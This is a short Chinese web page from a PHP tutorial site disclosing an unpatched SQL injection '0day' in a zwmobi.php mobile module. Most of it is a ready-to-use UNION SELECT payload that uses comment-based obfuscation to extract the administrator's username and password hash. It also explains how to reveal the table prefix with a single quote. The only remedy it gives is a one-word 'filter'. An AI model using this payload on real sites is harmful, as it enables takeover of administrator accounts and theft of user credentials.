来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 0Day说明:变量过滤不严,导致MYSQL注入发生。漏洞利用:zwmobi.php?zwmobi=bbsviewV=21cid=12/**/union/**/select/**/1,1,1,1,username,password,1,1,1,1/**/from/**/表前缀_member/**/where/**/uid=1其中uid......
0Day说明:变量过滤不严,导致MYSQL注入发生。
漏洞利用:zwmobi.php?zwmobi=bbsview&V=21&cid=12/**/union/**/select/**/1,1,1,1,username,password,1,1,1,1/**/from/**/表前缀_member/**/where/**/uid=1
其中uid就是用户的uid,因为默认管理uid是1.表前缀请替换为实际的表前缀,默认是zwmobi,可以通过在 cid=12后面加一个单引号爆出。
修复:过滤
官方补丁:尚未发布
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com